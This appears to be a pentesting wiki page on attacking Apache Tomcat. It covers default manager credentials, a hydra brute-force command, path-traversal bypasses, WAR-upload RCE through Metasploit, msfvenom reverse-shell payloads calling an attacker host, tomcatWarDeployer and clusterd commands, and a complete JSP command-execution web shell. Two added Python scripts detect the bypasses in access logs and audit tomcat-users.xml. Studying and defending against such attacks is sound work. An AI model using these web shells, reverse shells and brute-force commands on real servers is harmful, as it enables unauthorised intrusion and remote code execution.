# Tomcat

{{#include ../../../banners/hacktricks-training.md}}

## Discovery

- Usually runs on **port 8080**
- **Common Tomcat error:**
## Enumeration

### **Version Identification**

To find the version of Apache Tomcat, a simple command can be executed:

```bash
curl -s http://tomcat-site.local:8080/docs/ | grep Tomcat
```

This searches for the term "Tomcat" in the documentation index page, revealing the version in the title tag of the HTML response.

### **Manager Files Location**

Identifying the exact locations of the **`/manager`** and **`/host-manager`** directories is crucial, as their names might be altered. A brute-force search is recommended to locate these pages.

### **Username Enumeration**

For Tomcat versions older than 6, it is possible to enumerate usernames through:

```bash
msf> use auxiliary/scanner/http/tomcat_enum
```

### **Default Credentials**

The **`/manager/html`** directory is particularly sensitive as it allows the upload and deployment of WAR files, which can lead to code execution. This directory is protected by basic HTTP authentication, with common credentials being:

- admin:admin
- tomcat:tomcat
- admin:
- admin:s3cr3t
- tomcat:s3cr3t
- admin:tomcat

These credentials can be tested using:

```bash
msf> use auxiliary/scanner/http/tomcat_mgr_login
```

Another useful directory is **`/manager/status`**, which displays the Tomcat and OS version, aiding in vulnerability identification.

### **Brute Force Attack**

To attempt a brute force attack on the manager directory, one can use:

```bash
hydra -L users.txt -P /usr/share/seclists/Passwords/darkweb2017-top1000.txt -f 10.10.10.64 http-get /manager/html
```

Along with setting various parameters in Metasploit to target a specific host.

## Common Vulnerabilities

### **Password Backtrace Disclosure**

Accessing `/auth.jsp` may reveal the password in a backtrace under fortunate circumstances.

### **Double URL Encoding**

The CVE-2007-1860 vulnerability in `mod_jk` allows double URL-encoding path traversal, enabling unauthorized access to the management interface via a specially crafted URL.

To access the Tomcat management web interface go to: `pathTomcat/%252E%252E/manager/html`

### /examples

Apache Tomcat versions 4.x to 7.x include example scripts that are susceptible to information disclosure and cross-site scripting (XSS) attacks. These scripts, listed in full below, should be checked for unauthorized access and potential exploitation. Find [more info here](https://www.rapid7.com/db/vulnerabilities/apache-tomcat-example-leaks/)

- /examples/jsp/num/numguess.jsp
- /examples/jsp/dates/date.jsp
- /examples/jsp/snp/snoop.jsp
- /examples/jsp/error/error.html
- /examples/jsp/sessions/carts.html
- /examples/jsp/checkbox/check.html
- /examples/jsp/colors/colors.html
- /examples/jsp/cal/login.html
- /examples/jsp/include/include.jsp
- /examples/jsp/forward/forward.jsp
- /examples/jsp/plugin/plugin.jsp
- /examples/jsp/jsptoserv/jsptoservlet.jsp
- /examples/jsp/simpletag/foo.jsp
- /examples/jsp/mail/sendmail.jsp
- /examples/servlet/HelloWorldExample
- /examples/servlet/RequestInfoExample
- /examples/servlet/RequestHeaderExample
- /examples/servlet/RequestParamExample
- /examples/servlet/CookieExample
- /examples/servlet/JndiServlet
- /examples/servlet/SessionExample
- /tomcat-docs/appdev/sample/web/hello.jsp

### **Path Traversal Exploit**

In some [**vulnerable configurations of Tomcat**](https://www.acunetix.com/vulnerabilities/web/tomcat-path-traversal-via-reverse-proxy-mapping/) you can gain access to protected directories in Tomcat using the path: `/..;/`

So, for example, you might be able to **access the Tomcat manager page** by accessing: `www.vulnerable.com/lalala/..;/manager/html`

**Another way** to bypass protected paths using this trick is to access `http://www.vulnerable.com/;param=value/manager/html`

## RCE

Finally, if you have access to the Tomcat Web Application Manager, you can **upload and deploy a .war file (execute code)**.
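The bypass tricks described above (`/..;/`, `%252E%252E`, `;param=value`) and hits on the `/examples` apps all leave traces in the access log. The following Python script is an added example, not code from the original page: it canonicalizes request targets roughly the way Tomcat's mapper does (percent-decode, strip `;` path parameters, resolve `..`) and flags lines that end up at `/manager`, `/host-manager` or the example apps. The log lines, hosts and the simplified canonicalization rules are constructed for this example.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in the format of Tomcat's AccessLogValve "common" pattern
# (%h %l %u %t "%r" %s %b). Hosts, timestamps and paths are made up for this example.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /docs/ HTTP/1.1" 200 5123
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /lalala/..;/manager/html HTTP/1.1" 200 8831
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /app/%252E%252E/manager/html HTTP/1.1" 403 0
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /;param=value/manager/html HTTP/1.1" 200 8831
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /examples/servlet/SessionExample HTTP/1.1" 200 2210
10.0.0.7 - - [01/Jan/2024:10:00:06 +0000] "GET /myapp/index.jsp HTTP/1.1" 200 410
"""

REQUEST_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Paths a reverse proxy is usually meant to keep unreachable.
SENSITIVE_PREFIXES = ("/manager", "/host-manager")
# Example apps that should not be deployed on a production instance.
EXAMPLE_PREFIXES = ("/examples", "/tomcat-docs")


def canonicalize(target: str) -> dict:
    """Simplified model of how Tomcat resolves a request path (assumption of this example).

    Returns the canonical path plus a flag for every trick seen on the way:
    - double percent-encoding (%252E -> %2E -> .)
    - ';' path parameters (Tomcat strips them, many proxies match on the raw path)
    - '..' segments that climb out of the requested context
    """
    path = target.split("?", 1)[0]
    flags = set()

    once = unquote(path)
    twice = unquote(once)
    if twice != once:
        flags.add("double-encoding")
    path = twice

    # Drop ';key=value' path parameters from each segment, as the servlet mapper does.
    segments = []
    for seg in path.split("/"):
        if ";" in seg:
            flags.add("path-parameter")
            seg = seg.split(";", 1)[0]
        segments.append(seg)

    # Resolve '..' so that /lalala/..;/manager/html ends up as /manager/html.
    resolved = []
    for seg in segments:
        if seg == "..":
            flags.add("dot-dot-traversal")
            if resolved:
                resolved.pop()
        elif seg not in ("", "."):
            resolved.append(seg)
    return {"canonical": "/" + "/".join(resolved), "flags": sorted(flags)}


def classify(target: str) -> list:
    """Reasons a single request target deserves attention (empty list if none)."""
    info = canonicalize(target)
    reasons = list(info["flags"])
    if info["canonical"].startswith(SENSITIVE_PREFIXES):
        reasons.append("manager-access")
    if info["canonical"].startswith(EXAMPLE_PREFIXES):
        reasons.append("example-app-access")
    return reasons


def scan_log(text: str) -> list:
    """Return (host, raw target, reasons) for every request worth a look."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        reasons = classify(m["target"])
        if reasons:
            hits.append((m["host"], m["target"], reasons))
    return hits


if __name__ == "__main__":
    for host, target, reasons in scan_log(SAMPLE_LOG):
        print(f"{host} {target} -> {', '.join(reasons)}")
```

Tomcat's own access log records the request line as received, so the `..;` and `%252E` sequences stay visible there even when the request was rejected (the third sample line is a 403 and is still reported). The reverse proxy in front of Tomcat typically logged a harmless-looking path for the same request, which is why comparing what the proxy allowed with what Tomcat actually served is the useful check.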
### Limitations

You will only be able to deploy a WAR if you have **enough privileges** (roles: **admin**, **manager** and **manager-script**). Those details can be found in _tomcat-users.xml_, usually located at `/usr/share/tomcat9/etc/tomcat-users.xml` (it varies between versions) (see the [POST](#post) section).

```bash
# tomcat6-admin (debian) or tomcat6-admin-webapps (rhel) has to be installed
# deploy under "path" context path
curl --upload-file monshell.war -u 'tomcat:password' "http://localhost:8080/manager/text/deploy?path=/monshell"
# undeploy
curl "http://tomcat:Password@localhost:8080/manager/text/undeploy?path=/monshell"
```

### Metasploit

```bash
use exploit/multi/http/tomcat_mgr_upload
msf exploit(multi/http/tomcat_mgr_upload) > set rhost <IP>
msf exploit(multi/http/tomcat_mgr_upload) > set rport <PORT>
msf exploit(multi/http/tomcat_mgr_upload) > set httpusername <USERNAME>
msf exploit(multi/http/tomcat_mgr_upload) > set httppassword <PASSWORD>
msf exploit(multi/http/tomcat_mgr_upload) > exploit
```

### MSFVenom Reverse Shell

1. Create the war to deploy:

```bash
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war -o revshell.war
```

2. Upload the `revshell.war` file and access it (`/revshell/`):

### Bind and reverse shell with [tomcatWarDeployer.py](https://github.com/mgeeky/tomcatWarDeployer)

In some scenarios this doesn't work (for example old versions of sun).

#### Download

```bash
git clone https://github.com/mgeeky/tomcatWarDeployer.git
```

#### Reverse shell

```bash
./tomcatWarDeployer.py -U <USERNAME> -P <PASSWORD> -H <ATTACKER_IP> -p <ATTACKER_PORT> <VICTIM_IP>:<VICTIM_PORT>/manager/html/
```

#### Bind shell

```bash
./tomcatWarDeployer.py -U <USERNAME> -P <PASSWORD> -p <BIND_PORT> <VICTIM_IP>:<VICTIM_PORT>/manager/html/
```

### Using [Clusterd](https://github.com/hatRiot/clusterd)

```bash
clusterd.py -i 192.168.1.105 -a tomcat -v 5.5 --gen-payload 192.168.1.6:4444 --deploy shell.war --invoke --rand-payload -o windows
```

### Manual method - Web shell

Create **index.jsp** with this [content](https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp):

```java
<%@ page import="java.io.*" %>
<%
  // Command to run is taken from the "cmd" query parameter
  String cmd = request.getParameter("cmd");
  String output = "";
  if (cmd != null) {
    String s = null;
    try {
      Process p = Runtime.getRuntime().exec(cmd, null, null);
      BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
      // Collect stdout line by line
      while ((s = sI.readLine()) != null) {
        output += s + "\n";
      }
    } catch (IOException e) {
      e.printStackTrace();
    }
  }
%>
<%=output %>
```

```bash
mkdir webshell
cp index.jsp webshell
cd webshell
jar -cvf ../webshell.war *
# webshell.war is created
# Upload it
```

You could also install this (allows upload, download and command execution): [http://vonloesch.de/filebrowser.html](http://vonloesch.de/filebrowser.html)

### Manual Method 2

Get a JSP web shell such as [this one](https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp) and create a WAR file:

```bash
wget https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp
zip -r backup.war cmd.jsp
# When this file is uploaded to the manager GUI, the /backup application will be added to the table.
# Go to: http://tomcat-site.local:8180/backup/cmd.jsp
```

## POST

The Tomcat credentials file is named `tomcat-users.xml`, and it shows the role of each user inside Tomcat.

```bash
find / -name tomcat-users.xml 2>/dev/null
```

```xml
[...]
[...]
```

## Other tomcat scanning tools

- [https://github.com/p0dalirius/ApacheTomcatScanner](https://github.com/p0dalirius/ApacheTomcatScanner)

## References

- [https://github.com/simran-sankhala/Pentest-Tomcat](https://github.com/simran-sankhala/Pentest-Tomcat)
- [https://hackertarget.com/sample/nexpose-metasploitable-test.pdf](https://hackertarget.com/sample/nexpose-metasploitable-test.pdf)

{{#include ../../../banners/hacktricks-training.md}}
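As an added audit for the POST step above (example code, not from the page or from any project it links to): once `tomcat-users.xml` has been located, parse it, list every user holding a role that can deploy through the Manager or Host Manager apps, and flag accounts that still use one of the pairs from the Default Credentials section. The file content below is constructed; the `username`/`password`/`roles` attributes and the `http://tomcat.apache.org/xml` namespace match what Tomcat ships, while the set of roles treated as "deploy-capable" is this example's assumption.

```python
import sys
import xml.etree.ElementTree as ET

# Constructed sample in the layout Tomcat ships (note the default namespace,
# which is why tags are compared by local name below).
SAMPLE_TOMCAT_USERS = """\
<tomcat-users xmlns="http://tomcat.apache.org/xml"
              xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
              xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"
              version="1.0">
  <role rolename="manager-gui"/>
  <role rolename="manager-script"/>
  <role rolename="manager-status"/>
  <user username="tomcat" password="s3cr3t" roles="manager-gui,manager-script"/>
  <user username="monitor" password="example-long-random-value-1" roles="manager-status"/>
  <user username="deploy" password="example-long-random-value-2" roles="manager-script"/>
</tomcat-users>
"""

# Default pairs listed in the Default Credentials section of this page.
DEFAULT_CREDENTIALS = {
    ("admin", "admin"), ("tomcat", "tomcat"), ("admin", ""),
    ("admin", "s3cr3t"), ("tomcat", "s3cr3t"), ("admin", "tomcat"),
}

# Roles that allow deploying a WAR through the Manager (manager-gui, manager-script)
# or Host Manager (admin-gui, admin-script) apps; "admin" is included because the
# page lists it. manager-status is read-only and is deliberately not in this set.
PRIVILEGED_ROLES = {"admin", "admin-gui", "admin-script", "manager-gui", "manager-script"}


def _local_name(tag: str) -> str:
    """Strip the '{namespace}' prefix ElementTree puts on namespaced tags."""
    return tag.rsplit("}", 1)[-1]


def audit_tomcat_users(xml_text: str) -> list:
    """Return one finding per user that can deploy code or uses a default credential pair."""
    root = ET.fromstring(xml_text)
    findings = []
    for elem in root.iter():
        if _local_name(elem.tag) != "user":
            continue
        # Tomcat uses "username"; the older "name" spelling is also accepted here.
        name = elem.get("username", elem.get("name", ""))
        password = elem.get("password", "")
        roles = {r.strip() for r in elem.get("roles", "").split(",") if r.strip()}

        issues = []
        privileged = sorted(roles & PRIVILEGED_ROLES)
        if privileged:
            issues.append("can-deploy:" + ",".join(privileged))
        if (name, password) in DEFAULT_CREDENTIALS:
            issues.append("default-credentials")
        if issues:
            findings.append({"user": name, "roles": sorted(roles), "issues": issues})
    return findings


if __name__ == "__main__":
    # Pass the path printed by `find / -name tomcat-users.xml` to audit a real file.
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_TOMCAT_USERS
    for finding in audit_tomcat_users(text):
        print(f"{finding['user']}: {', '.join(finding['issues'])} (roles: {', '.join(finding['roles'])})")
```

A user with `manager-script` alone is enough to deploy a WAR through `/manager/text`, so a CI or deployment account with that role deserves the same scrutiny as an interactive `manager-gui` one; the script reports both.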